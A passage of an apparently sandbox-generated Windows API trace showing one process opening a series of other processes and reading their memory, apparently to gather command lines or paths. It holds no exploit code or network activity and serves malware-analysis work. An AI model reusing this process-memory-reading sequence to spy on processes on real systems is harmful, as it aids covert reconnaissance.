CloseHandle (hObject=0x28c) returned 1 [0264.564] _ui64tow_s (in: _Value=0x7b8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1976") returned 0x0 [0264.564] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1976") returned 4 [0264.564] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.564] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.565] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b8) returned 0x28c [0264.565] GetLastError () returned 0x0 [0264.566] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.566] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x46c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.566] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.566] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x761ce0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.566] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7618f8, lpBuffer=0x138c580, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.567] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.567] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.567] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x46c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.567] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7612e0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.567] malloc (_Size=0x70) returned 0xd9d190 [0264.567] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x761960, lpBuffer=0xd9d190, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.568] free (_Block=0xd9d190) [0264.568] CloseHandle (hObject=0x28c) returned 1 [0264.568] _ui64tow_s (in: _Value=0xf8c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3980") returned 0x0 [0264.568] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3980") returned 4 [0264.569] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.569] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.570] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf8c) returned 0x28c [0264.570] GetLastError () returned 0x0 [0264.570] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.570] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x37d018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.570] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.570] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.570] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.570] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.571] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.571] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x37d020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.571] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.571] malloc (_Size=0x66) returned 0xdafe70 [0264.571] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5d18e6, lpBuffer=0xdafe70, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0264.572] free (_Block=0xdafe70) [0264.575] CloseHandle (hObject=0x28c) returned 1 [0264.575] _ui64tow_s (in: _Value=0x748, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1864") returned 0x0 [0264.576] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1864") returned 4 [0264.576] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.576] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x748) returned 0x28c [0264.577] GetLastError () returned 0x0 [0264.577] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.577] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x31e018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.577] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.577] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.578] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481888, lpBuffer=0x138c580, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.578] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.578] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.578] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x31e020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.578] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.579] malloc (_Size=0x72) returned 0xd9d190 [0264.579] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4818f2, lpBuffer=0xd9d190, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.579] free (_Block=0xd9d190) [0264.579] CloseHandle (hObject=0x28c) returned 1 [0264.580] _ui64tow_s (in: _Value=0x350, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="848") returned 0x0 [0264.580] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="848") returned 3 [0264.580] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.580] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.581] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x350) returned 0x28c [0264.581] GetLastError () returned 0x0 [0264.581] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.581] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x239018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.581] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.629] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.629] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.629] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.630] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.630] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x239020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.630] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.630] malloc (_Size=0x66) returned 0xdb02d0 [0264.630] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f18e6, lpBuffer=0xdb02d0, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.631] free (_Block=0xdb02d0) [0264.631] CloseHandle (hObject=0x28c) returned 1 [0264.632] _ui64tow_s (in: _Value=0xf14, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3860") returned 0x0 [0264.634] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3860") returned 4 [0264.634] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.634] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.635] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf14) returned 0x28c [0264.635] GetLastError () returned 0x0 [0264.635] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.635] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3f1018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.635] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.636] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.636] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541888, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.636] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.636] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.636] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3f1020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.636] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.637] malloc (_Size=0x5e) returned 0xdb03b0 [0264.637] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5418de, lpBuffer=0xdb03b0, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.637] free (_Block=0xdb03b0) [0264.638] CloseHandle (hObject=0x28c) returned 1 [0264.638] _ui64tow_s (in: _Value=0xf64, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3940") returned 0x0 [0264.638] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3940") returned 4 [0264.638] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.638] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf64) returned 0x28c [0264.639] GetLastError () returned 0x0 [0264.639] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.639] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3c1018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.640] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.640] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.640] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531888, lpBuffer=0x138c580, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.640] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.640] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.641] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3c1020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.641] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.641] malloc (_Size=0x80) returned 0xd9d190 [0264.641] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531900, lpBuffer=0xd9d190, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.641] free (_Block=0xd9d190) [0264.644] CloseHandle (hObject=0x28c) returned 1 [0264.644] _ui64tow_s (in: _Value=0x1004, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4100") returned 0x0 [0264.645] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4100") returned 4 [0264.645] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.645] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1004) returned 0x28c [0264.646] GetLastError () returned 0x0 [0264.646] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.646] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x301018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.647] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.647] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.647] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571888, lpBuffer=0x138c580, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.647] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.648] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.648] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x301020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.648] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x571270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.648] malloc (_Size=0x60) returned 0xdb03b0 [0264.648] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5718e0, lpBuffer=0xdb03b0, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.649] free (_Block=0xdb03b0) [0264.649] CloseHandle (hObject=0x28c) returned 1 [0264.649] _ui64tow_s (in: _Value=0x100c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4108") returned 0x0 [0264.649] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4108") returned 4 [0264.649] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.649] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.650] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x100c) returned 0x28c [0264.650] GetLastError () returned 0x0 [0264.651] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.651] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x387018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.652] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.652] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1cb0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.652] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1888, lpBuffer=0x138c580, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.653] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.653] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.653] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x387020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.653] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.653] malloc (_Size=0x82) returned 0xd9d190 [0264.653] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1902, lpBuffer=0xd9d190, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.654] free (_Block=0xd9d190) [0264.654] CloseHandle (hObject=0x28c) returned 1 [0264.655] _ui64tow_s (in: _Value=0x1014, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4116") returned 0x0 [0264.655] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4116") returned 4 [0264.655] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 